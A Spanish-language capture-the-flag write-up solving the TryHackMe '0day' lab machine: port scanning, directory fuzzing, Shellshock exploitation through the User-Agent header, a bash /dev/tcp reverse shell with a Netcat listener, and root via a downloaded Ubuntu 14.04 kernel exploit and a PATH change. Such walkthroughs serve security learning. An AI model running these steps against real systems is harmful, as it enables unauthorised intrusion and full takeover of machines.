TryHackme 0day

Hoy vamos a resolver la maquina 0day, es una maquina bonita de dificultad media muy sencilla.

Vamos por lo basico ya se la saben, Nmap para ver los puertos que estan abiertos.

# Nmap 7.94SVN scan initiated Sun Dec 10 15:01:08 2023 as: nmap -sCV -p22,80 -oN target.txt 10.10.248.240
Nmap scan report for 10.10.248.240
Host is up (0.062s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 10 15:01:18 2023 -- 1 IP address (1 host up) scanned in 9.61 seconds

Ahora igualmente usando Nmap lo lanzamos para ver que versiones y servicios corren para estos puertos.

Si vamos al puerto 80 donde esta la web este es lo que observamos nada util.

Wfuzz

Ahora haciendo uso de Wfuzz vamos a enumerar directorios ocultos dentro de la maquina el cual nos encontramos con varios pero el que nos interesa es cgi-bin.

Ya que la maquina es vulnerable a un ShellShock y nos aprovecharemos de este directorio.

Y bueno de esta forma se explota un ShellShock el payload lo metemos en el User-Agent, observamos que podemos leer el /etc/passwd de la maquina, nos interpreta los comando es decir que podemos ganar acceso.

Ahora ganamos acceso en el User-Agent ponemos el tipica cadena de bash -i >& /dev/tcp/IP/Port 0>&1.

En la parte de abajo nos ponemos en escucha con Netcat y observamos que ganamos acceso como el usuario www-data.

Capturamos nuestra primera bandera la de user.txt.

Escalada de Privilegios

Wachamos el kernel del ubuntu el cual es un 14.04 que es vulnerable a una escalada de privilegios.

Busca el exploit usando searchsploit ubuntu 14.04 y te descargas este exploit que esta hecho en C con este numero de identificado 37292.

• Ahora en en nuestra maquina en local nos compartimos un servidor con python.

• Como punto numero dos desde la maquina victima usando wget nos descargamos el .C.

Le cambiamos el nombre a ofs.c, pero si lo intentamos ejecutar como dice en el Poc del exploit nos dice No such file or directory en español No existe tal archivo o directorio, esto se refiere al compilador gcc.

La ruta de gcc es /usr/bin/gcc. Pero podemos manipular el PATH para que la ruta empieze donde nosotros queramos.

• Si hacemos un echo $PATH. Observamos que el PATH inicia en /usr/local/bin.

• Pero si hacemos un export PATH=/tmp:$PATH y volvemos a hacer un echo $PATH.

• Observamos que el PATH ahora inicia donde nostros lo hemos definido en el directorio /tmp.

Ahora si seguimos el Poc que nos daban en el exploit y ejecutamos, observamos que nos convertimos en root, y bueno capturamos nuestra ultima bandera la de root.txt. Y bueno MAQUINA RESUELTA